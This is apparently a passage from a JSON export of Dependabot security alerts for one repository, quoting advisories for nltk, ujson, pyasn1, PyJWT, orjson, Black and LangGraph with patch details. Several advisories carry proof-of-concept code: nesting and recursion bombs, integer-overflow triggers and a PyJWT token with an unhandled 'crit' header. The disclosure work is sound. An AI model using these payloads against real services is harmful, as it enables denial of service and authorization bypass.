JSONTaggedDecoder\n\ndepth = sys.getrecursionlimit() + 50 # e.g. 1050\npayload = '{\"x\":' * depth + \"null\" + \"}\" * depth\n\n# Raises RecursionError, crashing the process\njson.loads(payload, cls=JSONTaggedDecoder)\n```\n\n### Impact\nAny code path that passes externally-supplied JSON to \n`JSONTaggedDecoder` is vulnerable to denial of service.\nThe severity depends on whether such a path exists in the \ncalling code (e.g. 
`nltk/data.py`).\n\n### Suggested Fix\nAdd a depth parameter with a hard limit:\n```python\n@classmethod\ndef decode_obj(cls, obj, _depth=0):\n if _depth > 100:\n raise ValueError(\"JSON nesting too deep\")\n if isinstance(obj, dict):\n obj = {key: cls.decode_obj(val, _depth + 1) \n for (key, val) in obj.items()}\n elif isinstance(obj, list):\n obj = list(cls.decode_obj(val, _depth + 1) for val in obj)\n```","severity":"medium","identifiers":[{"value":"GHSA-rf74-v2fm-23pw","type":"GHSA"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-rf74-v2fm-23pw"},{"url":"https://github.com/advisories/GHSA-rf74-v2fm-23pw"}],"published_at":"2026-03-18T20:17:43Z","updated_at":"2026-03-18T20:17:44Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","score":5.1}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 
3.9.3","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/32","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/32","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":31,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-c8rr-9gxc-jprv","cve_id":"CVE-2026-32875","summary":"UltraJSON has an integer overflow handling large indent leads to buffer overflow or infinite loop","description":"### Summary\n\n`ujson.dumps()` crashes the Python interpreter (segmentation fault) when the product of the `indent` parameter and the nested depth of the input exceeds INT32_MAX. It can also get stuck in an infinite loop if the `indent` is a large negative number. Both are caused by an integer overflow/underflow whilst calculating how much memory to reserve for indentation. And both can be used to achieve denial of service.\n\n(Note: A negative indent to `ujson` means add spaces after colons but do not add line breaks or indentation. It is unclear to the current maintainers whether this was ever even an intended feature or just a byproduct of the way it was written.)\n\n### Exploitability\n\nTo be vulnerable, a service must call `ujson.dump()`/`ujson.dumps()`/`ujson.encode()` whilst giving untrusted users control over the `indent` parameter and not restrict that indentation to reasonably small non-negative values. 
(Even with the fix for this vulnerability, such usage is strongly advised against since even a bug-free JSON serialiser would be vulnerable to denial of service simply by the attacker requesting indents that have the server needlessly filling out gigabytes of whitespace.)\n\nA service may also be vulnerable to the infinite loop if it uses a fixed _negative_ `indent`. An underflow always occurs for any negative indent when the input data is at least one level nested but, for small negative indents, the underflow is usually accidentally rectified by another overflow. As far as the maintainers are aware, the infinite loop can not be reached for indentations from -1 to -65536 / max_recursion_depth_as_limited_by_stack_size but users of negative indents are encouraged to consider their service affected even if the infinite loop seems unreachable.\n\n### Example\n\n```python\nimport ujson\n\ndef example(depth, indent):\n a = [0]\n for i in range(1000):\n a = [a]\n ujson.dumps(a, indent=indent)\n\nexample(1, 2**30) # segfault\nexample(1000, -200) # infinite loop\n```\n\n### Patches\n\nujson 5.12.0, containing 486bd4553dc471a1de11613bc7347a6b318e37ea, promotes the integer types where the overflow occurred, skips the indentation code path for negative indent (which was supposed to be a no-op) and places an artificial cap of 1000 on the `indent` parameter.\n\n### Workarounds\n\nUsers who don't wish to upgrade can either use a fixed indentation, no indentation or ensure indentation is non-negative and not enormous (below `2**31 / max_recursion_depth_as_limited_by_stack_size`).\n\n### References\n\nThe original bug report can be found at https://github.com/ultrajson/ultrajson/issues/700\n\nThis issue was independently discovered by @coco1629, @EthanKim88 and 
@vmfunc.","severity":"high","identifiers":[{"value":"GHSA-c8rr-9gxc-jprv","type":"GHSA"},{"value":"CVE-2026-32875","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c8rr-9gxc-jprv"},{"url":"https://github.com/ultrajson/ultrajson/issues/700"},{"url":"https://github.com/ultrajson/ultrajson/commit/486bd4553dc471a1de11613bc7347a6b318e37ea"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32875"},{"url":"https://github.com/advisories/GHSA-c8rr-9gxc-jprv"}],"published_at":"2026-03-18T13:01:24Z","updated_at":"2026-03-20T21:19:57Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.1.0, <= 5.11.0","first_patched_version":{"identifier":"5.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00069,"percentile":0.21015},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-190","name":"Integer Overflow or Wraparound"},{"cwe_id":"CWE-787","name":"Out-of-bounds Write"},{"cwe_id":"CWE-835","name":"Loop with Unreachable Exit Condition ('Infinite Loop')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.1.0, <= 
5.11.0","first_patched_version":{"identifier":"5.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/31","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/31","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":30,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-wgvc-ghv9-3pmm","cve_id":"CVE-2026-32874","summary":"UltraJSON has a Memory Leak parsing large integers allows DoS ","description":"#### Summary\n\nujson 5.4.0 to 5.11.0 inclusive contain an accumulating memory leak in JSON parsing _large_ (outside of the range [-2^63, 2^64 - 1]) integers.\n\n#### Exploitability\n\nAny service that calls `ujson.load()`/`ujson.loads()`/`ujson.decode()` on untrusted inputs is affected and vulnerable to denial of service attacks.\n\n#### Details\n\nThe leaked memory is a copy of the string form of the integer plus an additional NULL byte. The leak occurs irrespective of whether the integer parses successfully or is rejected due to having more than `sys.get_int_max_str_digits()` digits, meaning that any sized leak per malicious JSON can be achieved provided that there is no limit on the overall size of the payload.\n\n```python\nujson.loads(str(2 ** 64 - 1)) # No leak\nujson.loads(str(2 ** 64)) # Leaks\nujson.loads(str(10 ** sys.get_int_max_str_digits())) # Leaks and raises ValueError\n```\n\n#### Fix\n\nThe leak is fixed in `ujson 5.12.0` (4baeb950df780092bd3c89fc702a868e99a3a1d2). 
There are no workarounds beyond upgrading to an unaffected version.\n\n#### Credits\n\nDiscovered by Cameron Criswell/Skevros using Coverage-guided fuzzing (libFuzzer + AddressSanitizer)","severity":"high","identifiers":[{"value":"GHSA-wgvc-ghv9-3pmm","type":"GHSA"},{"value":"CVE-2026-32874","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-wgvc-ghv9-3pmm"},{"url":"https://github.com/ultrajson/ultrajson/commit/4baeb950df780092bd3c89fc702a868e99a3a1d2"},{"url":"https://github.com/ultrajson/ultrajson/releases/tag/5.12.0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32874"},{"url":"https://github.com/advisories/GHSA-wgvc-ghv9-3pmm"}],"published_at":"2026-03-18T13:01:15Z","updated_at":"2026-03-20T21:19:51Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.4.0, <= 5.11.0","first_patched_version":{"identifier":"5.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00073,"percentile":0.22173},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-401","name":"Missing Release of Memory after Effective Lifetime"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.4.0, <= 
5.11.0","first_patched_version":{"identifier":"5.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/30","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/30","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":29,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"pyasn1"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-jr27-m4p2-rc6r","cve_id":"CVE-2026-30922","summary":"Denial of Service in pyasn1 via Unbounded Recursion","description":"### Summary\nThe `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application.\n\n### Details\nThe vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.\nVulnerable Code Locations:\n1. `indefLenValueDecoder` (Line 998):\n```for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):```\nThis method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.\n\n2. 
`valueDecoder` (Lines 786 and 907):\n```for component in decodeFun(substrate, componentType, **options):```\nThis method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types.\n\n4. `_decodeComponentsSchemaless` (Line 661):\n```for component in decodeFun(substrate, **options):```\nThis method handles decoding when no schema is provided.\n\nIn all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit.\n\n### PoC\n```\nimport sys\nfrom pyasn1.codec.ber import decoder\n\nsys.setrecursionlimit(100000)\n\nprint(\"[*] Generating Recursion Bomb Payload...\")\ndepth = 50_000\nchunk = b'\\x30\\x80' \npayload = chunk * depth\n\nprint(f\"[*] Payload size: {len(payload) / 1024:.2f} KB\")\nprint(\"[*] Triggering Decoder...\")\n\ntry:\n decoder.decode(payload)\nexcept RecursionError:\n print(\"[!] Crashed: Recursion Limit Hit\")\nexcept MemoryError:\n print(\"[!] Crashed: Out of Memory\")\nexcept Exception as e:\n print(f\"[!] Crashed: {e}\")\n```\n\n```\n[*] Payload size: 9.77 KB\n[*] Triggering Decoder...\n[!] Crashed: Recursion Limit Hit\n```\n\n### Impact\n- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.\n- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.\n- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. 
A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack.\n\n### Credits\nVulnerability discovered by Kevin Tu of TMIR at ByteDance.","severity":"high","identifiers":[{"value":"GHSA-jr27-m4p2-rc6r","type":"GHSA"},{"value":"CVE-2026-30922","type":"CVE"}],"references":[{"url":"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"},{"url":"https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8"},{"url":"https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30922"},{"url":"https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"},{"url":"http://www.openwall.com/lists/oss-security/2026/03/20/4"},{"url":"https://lists.debian.org/debian-lts-announce/2026/05/msg00001.html"},{"url":"https://github.com/advisories/GHSA-jr27-m4p2-rc6r"}],"published_at":"2026-03-17T16:17:33Z","updated_at":"2026-05-01T18:31:19Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"<= 0.6.2","first_patched_version":{"identifier":"0.6.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00026,"percentile":0.07182},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"<= 
0.6.2","first_patched_version":{"identifier":"0.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/29","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/29","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":28,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"PyJWT"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-752w-5fwx-jx9f","cve_id":"CVE-2026-32597","summary":"PyJWT accepts unknown `crit` header extensions","description":"## Summary\n\nPyJWT does not validate the `crit` (Critical) Header Parameter defined in\nRFC 7515 §4.1.11. When a JWS token contains a `crit` array listing\nextensions that PyJWT does not understand, the library accepts the token\ninstead of rejecting it. This violates the **MUST** requirement in the RFC.\n\nThis is the same class of vulnerability as CVE-2025-59420 (Authlib),\nwhich received CVSS 7.5 (HIGH).\n\n---\n\n## RFC Requirement\n\nRFC 7515 §4.1.11:\n\n> The \"crit\" (Critical) Header Parameter indicates that extensions to this\n> specification and/or [JWA] are being used that **MUST** be understood and\n> processed. [...] 
If any of the listed extension Header Parameters are\n> **not understood and supported** by the recipient, then the **JWS is invalid**.\n\n---\n\n## Proof of Concept\n\n```python\nimport jwt # PyJWT 2.8.0\nimport hmac, hashlib, base64, json\n\n# Construct token with unknown critical extension\nheader = {\"alg\": \"HS256\", \"crit\": [\"x-custom-policy\"], \"x-custom-policy\": \"require-mfa\"}\npayload = {\"sub\": \"attacker\", \"role\": \"admin\"}\n\ndef b64url(data):\n return base64.urlsafe_b64encode(data).rstrip(b\"=\").decode()\n\nh = b64url(json.dumps(header, separators=(\",\", \":\")).encode())\np = b64url(json.dumps(payload, separators=(\",\", \":\")).encode())\nsig = b64url(hmac.new(b\"secret\", f\"{h}.{p}\".encode(), hashlib.sha256).digest())\ntoken = f\"{h}.{p}.{sig}\"\n\n# Should REJECT — x-custom-policy is not understood by PyJWT\ntry:\n result = jwt.decode(token, \"secret\", algorithms=[\"HS256\"])\n print(f\"ACCEPTED: {result}\")\n # Output: ACCEPTED: {'sub': 'attacker', 'role': 'admin'}\nexcept Exception as e:\n print(f\"REJECTED: {e}\")\n```\n\n**Expected:** `jwt.exceptions.InvalidTokenError: Unsupported critical extension: x-custom-policy`\n**Actual:** Token accepted, payload returned.\n\n### Comparison with RFC-compliant library\n\n```python\n# jwcrypto — correctly rejects\nfrom jwcrypto import jwt as jw_jwt, jwk\nkey = jwk.JWK(kty=\"oct\", k=b64url(b\"secret\"))\njw_jwt.JWT(jwt=token, key=key, algs=[\"HS256\"])\n# raises: InvalidJWSObject('Unknown critical header: \"x-custom-policy\"')\n```\n\n---\n\n## Impact\n\n- **Split-brain verification** in mixed-library deployments (e.g., API\n gateway using jwcrypto rejects, backend using PyJWT accepts)\n- **Security policy bypass** when `crit` carries enforcement semantics\n (MFA, token binding, scope restrictions)\n- **Token binding bypass** — RFC 7800 `cnf` (Proof-of-Possession) can be\n silently ignored\n- See CVE-2025-59420 for full impact analysis\n\n---\n\n## Suggested Fix\n\nIn `jwt/api_jwt.py`, 
add validation in `_validate_headers()` or\n`decode()`:\n\n```python\n_SUPPORTED_CRIT = {\"b64\"} # Add extensions PyJWT actually supports\n\ndef _validate_crit(self, headers: dict) -> None:\n crit = headers.get(\"crit\")\n if crit is None:\n return\n if not isinstance(crit, list) or len(crit) == 0:\n raise InvalidTokenError(\"crit must be a non-empty array\")\n for ext in crit:\n if ext not in self._SUPPORTED_CRIT:\n raise InvalidTokenError(f\"Unsupported critical extension: {ext}\")\n if ext not in headers:\n raise InvalidTokenError(f\"Critical extension {ext} not in header\")\n```\n\n---\n\n## CWE\n\n- CWE-345: Insufficient Verification of Data Authenticity\n- CWE-863: Incorrect Authorization\n\n## References\n\n- [RFC 7515 §4.1.11](https://www.rfc-editor.org/rfc/rfc7515.html#section-4.1.11)\n- [CVE-2025-59420 — Authlib crit bypass (CVSS 7.5)](https://osv.dev/vulnerability/GHSA-9ggr-2464-2j32)\n- [RFC 7800 — Proof-of-Possession Key Semantics](https://www.rfc-editor.org/rfc/rfc7800)","severity":"high","identifiers":[{"value":"GHSA-752w-5fwx-jx9f","type":"GHSA"},{"value":"CVE-2026-32597","type":"CVE"}],"references":[{"url":"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32597"},{"url":"https://lists.debian.org/debian-lts-announce/2026/05/msg00008.html"},{"url":"https://github.com/advisories/GHSA-752w-5fwx-jx9f"}],"published_at":"2026-03-13T20:05:04Z","updated_at":"2026-05-05T18:34:23Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"PyJWT"},"severity":"high","vulnerable_version_range":"<= 
2.11.0","first_patched_version":{"identifier":"2.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00013,"percentile":0.02358},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","score":7.5},"cwes":[{"cwe_id":"CWE-345","name":"Insufficient Verification of Data Authenticity"},{"cwe_id":"CWE-863","name":"Incorrect Authorization"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"PyJWT"},"severity":"high","vulnerable_version_range":"<= 2.11.0","first_patched_version":{"identifier":"2.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/28","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/28","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":27,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"orjson"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-hx9q-6w63-j58v","cve_id":"CVE-2025-67221","summary":"orjson does not limit recursion for deeply nested JSON documents","description":"The orjson.dumps function in orjson before 3.11.6 does not limit recursion for deeply nested JSON 
documents.","severity":"high","identifiers":[{"value":"GHSA-hx9q-6w63-j58v","type":"GHSA"},{"value":"CVE-2025-67221","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-67221"},{"url":"https://github.com/ijl/orjson"},{"url":"https://github.com/kpatsakis/orjson_vulnerability"},{"url":"https://github.com/ijl/orjson/issues/620"},{"url":"https://github.com/kpatsakis/CVE-2025-67221/issues/1"},{"url":"https://github.com/ijl/orjson/commit/62bb185b70785ded49c79c26f8c9781f1e6fe370"},{"url":"https://github.com/advisories/GHSA-hx9q-6w63-j58v"}],"published_at":"2026-01-22T18:30:33Z","updated_at":"2026-03-12T20:49:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"orjson"},"severity":"high","vulnerable_version_range":"< 3.11.6","first_patched_version":{"identifier":"3.11.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P","score":7.7}},"epss":{"percentage":0.00025,"percentile":0.06553},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"orjson"},"severity":"high","vulnerable_version_range":"< 
3.11.6","first_patched_version":{"identifier":"3.11.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/27","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/27","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":26,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"black"},"manifest_path":"methods/evermemos/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-3936-cmfr-pm3m","cve_id":"CVE-2026-32274","summary":"Black: Arbitrary file writes from unsanitized user input in cache file name","description":"### Impact\n\nBlack writes a cache file, the name of which is computed from various formatting options. The value of the `--python-cell-magics` option was placed in the filename without sanitization, which allowed an attacker who controls the value of this argument to write cache files to arbitrary file system locations. 
\n\n### Patches\n\nFixed in Black 26.3.1.\n\n### Workarounds\n\nDo not allow untrusted user input into the value of the `--python-cell-magics` option.","severity":"high","identifiers":[{"value":"GHSA-3936-cmfr-pm3m","type":"GHSA"},{"value":"CVE-2026-32274","type":"CVE"}],"references":[{"url":"https://github.com/psf/black/security/advisories/GHSA-3936-cmfr-pm3m"},{"url":"https://github.com/psf/black/pull/5038"},{"url":"https://github.com/psf/black/commit/4937fe6cf241139ddbfc16b0bdbb5b422798909d"},{"url":"https://github.com/psf/black/releases/tag/26.3.1"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32274"},{"url":"https://github.com/advisories/GHSA-3936-cmfr-pm3m"}],"published_at":"2026-03-12T18:33:10Z","updated_at":"2026-03-13T13:36:21Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"black"},"severity":"high","vulnerable_version_range":"< 26.3.1","first_patched_version":{"identifier":"26.3.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N","score":8.7}},"epss":{"percentage":0.00021,"percentile":0.05654},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"black"},"severity":"high","vulnerable_version_range":"< 
26.3.1","first_patched_version":{"identifier":"26.3.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/26","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/26","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":25,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langgraph"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-g48c-2wqr-h844","cve_id":"CVE-2026-28277","summary":"LangGraph checkpoint loading has unsafe msgpack deserialization","description":"LangGraph checkpointers can load msgpack-encoded checkpoints that reconstruct Python objects during deserialization. If an attacker can modify checkpoint data in the backing store (for example, after a database compromise or other privileged write access to the persistence layer), they can potentially supply a crafted payload that triggers unsafe object reconstruction when the checkpoint is loaded.\n\nThis is a **post-exploitation / defense-in-depth** issue. Exploitation requires the ability to write attacker-controlled checkpoint bytes at rest. In most deployments that prerequisite already implies a serious incident; the additional risk is turning “checkpoint-store write access” into code execution in the application runtime, which can expand blast radius (for example by exposing environment variables or cloud credentials available to the runtime).\n\nThere is no evidence of exploitation in the wild, and LangGraph is not aware of a practical exploitation path in existing deployments today. 
This change is intended to reduce the blast radius of a checkpoint-store compromise.\n\n## Affected users / systems\n\nUsers may be affected if they:\n\n- use a persistent checkpointer (database, remote store, shared filesystem, etc.),\n- load/resume from checkpoints, and\n- operate in an environment where an attacker could gain privileged write access to checkpoint data in the backing store.\n\nThis issue requires the attacker to be able to modify persisted checkpoint bytes (or to compromise a trusted component that writes them). It is generally not reachable by an unauthenticated remote attacker in a correctly configured deployment.\n\n## Impact\n- Potential **arbitrary code execution** or other unsafe side effects during checkpoint deserialization.\n- Escalation from “write access to checkpoint store” to “code execution in the application runtime,” which may expose runtime secrets or provide access to other systems the runtime can reach.\n\n## Exploitation scenario (high level)\n1. Attacker gains privileged write access to the checkpoint store (for example, via database compromise, leaked credentials, or abuse of an administrative data path).\n2. Attacker writes a crafted checkpoint payload containing msgpack data intended to reconstruct dangerous objects.\n3. 
Application resumes and deserializes the checkpoint; unsafe reconstruction could execute attacker-controlled behavior.\n\n## Mitigation / remediation\nLangGraph provides an allowlist-based hardening mechanism for msgpack checkpoint deserialization.\n\n### Strict mode (environment variable)\n- **`LANGGRAPH_STRICT_MSGPACK`**\n - When set truthy (`1`, `true`, `yes`), the default msgpack deserialization policy becomes strict.\n - Concretely: `JsonPlusSerializer()` will default `allowed_msgpack_modules` to `None` (strict) instead of `True` (warn-and-allow), unless `allowed_msgpack_modules=...` is explicitly passed.\n\n### `allowed_msgpack_modules` (serializer/checkpointer config)\nThis setting controls what msgpack “ext” types are allowed to be reconstructed.\n\n- `True` (default when strict mode is not enabled): allow all ext types, but log a warning when deserializing a type that is not explicitly registered.\n- `None` (strict): only a built-in safe set is reconstructed; other ext types are blocked.\n- `[(module, class_name), ...]` (strict allowlist): the built-in safe set plus exactly the listed symbols are reconstructed (exact-match).\n\n### Built-in safe set\nA small set of types is always treated as safe to reconstruct (for example `datetime` types, `uuid.UUID`, `decimal.Decimal`, `set`/`frozenset`/`deque`, `ipaddress` types, `pathlib` paths, `zoneinfo.ZoneInfo`, compiled regex patterns, and selected LangGraph internal types).\n\n### Automatically derived allowlist (only when compiling graphs)\nWhen `LANGGRAPH_STRICT_MSGPACK` is enabled and `StateGraph` is compiled, LangGraph derives an allowlist from the graph’s schemas and channels and applies it to the checkpointer.\n\n- The allowlist is built by walking the state/input/output/context schemas (plus node/branch input schemas) and channel value/update types. 
It includes Pydantic v1/v2 models, dataclasses, enums, TypedDict field types, and common typing constructs (containers, unions, `Annotated`).\n- LangGraph also includes a curated set of common LangChain message classes.\n\nThis derived allowlist is only applied if the selected checkpointer supports `with_allowlist(...)`. If a user is constructing serializers/checkpointers manually (or using a checkpointer that does not support allowlist propagation), they will need to configure `allowed_msgpack_modules` themselves.\n\n### Operational guidance\n- Treat checkpoint stores as integrity-sensitive. Restrict write access and rotate credentials if compromise is suspected.\n- Enable strict mode (`LANGGRAPH_STRICT_MSGPACK=true`) in production if feasible, and rely on schema-driven allowlisting to reduce incompatibilities.\n- Avoid providing custom msgpack deserialization hooks that reconstruct arbitrary types unless checkpoint data is fully trusted.\n\n## Limitations / important notes\n- If a checkpointer implementation does **not** support allowlist application (i.e., does not implement `with_allowlist`), allowlist enforcement may be skipped (with a warning). In that situation, strict expectations may not hold.\n- If an application supplies a custom msgpack unpack hook (`ext_hook`), the custom hook controls reconstruction and can bypass the default allowlist checks (intentional escape hatch, but it 